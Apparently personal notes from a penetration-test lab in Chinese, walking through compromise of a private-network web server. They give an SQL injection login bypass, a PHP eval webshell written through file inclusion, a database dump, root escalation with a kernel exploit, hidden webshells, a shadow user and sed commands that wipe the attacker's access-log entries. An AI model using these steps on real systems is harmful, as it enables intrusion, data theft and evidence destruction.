- 查找目标ip
nmap -sn 192.168.18.0/24
- 查找端口
nmap -sS -p 1-2000 192.168.18.190 22/tcp open ssh 80/tcp open http
- 存活端口进行访问
- 进行一个子域名扫描
http://192.168.18.190/imgages #图片地址 http://192.168.18.190/test.php #显示文件参数为空,应该是进行文件读取 http://192.168.18.190/add.php #上传文件路径 http://192.168.18.190/head.php #图片 http://192.168.18.190/index.php #首页 http://192.168.18.190/show.php #空白 http://192.168.18.190/c.php #空白
- 尝试文件包含
- 实际发现,是文件下载
- 下载域名,扫出来的php
- c.php中有mysql的用户名和密码
- 没有开启,远程访问,无法连接数据库
- index.php中有sql语句的过滤规则
- 重新构造select语句
select * from name where password= '123456' and username = 'huang' ; select * from name where password= '123456\' and username = 'or 1=1#'
- 成功登录
- 下载登录后的页面源码发现保存地址
- 上传图片马
- 和此处的文件包含相互配合
- 进行抓包并构造上传好的图片马的路径
- GIF89a
- 猜测成功
- 成功,接下来直接连接
- 连接失败,post请求的文件包含不知道要怎么写,但自己还是可以使用
- 另外在写一句木马用来连接
load=uploaded_images/456.jpeg&continue=continue&cod=file_put_contents("uploaded_images/mm.php",'<?php @eval($_POST["code"]); ?>');
- 成功
- 上传哥斯拉的木马
- 发现之前没有发现过的目录和php文件
- 原来是数据库管理目录
- 使用之前的mysql密码这次登录成功了
- 拖库成功
- 查看mysql配置文件,里面有root账户和密码
- 账户密码正确的,越权成功
- 复制多份木马并隐藏
- 准备影子用户和给予uid权限
- 删除之前留下的木马
- 进入日志
cat access.log | grep -a 192.168.18.184* | wc -l #查找有关日志 73417 sed -i '/192.168.18.184/d' access.log cat access.log | grep -a 192.168.18.184* | wc -l 0
- 删除指定日志
- 结束
- 提权方式2
- 使用,uname获取版本号,然后使用searchsploit查询漏洞
- 上传37292.c
- 进行编译,然后执行
- 如果出现cc1错误,可以执行下面代码更改path
export PATH=/usr/local/bin:/usr/bin:/bin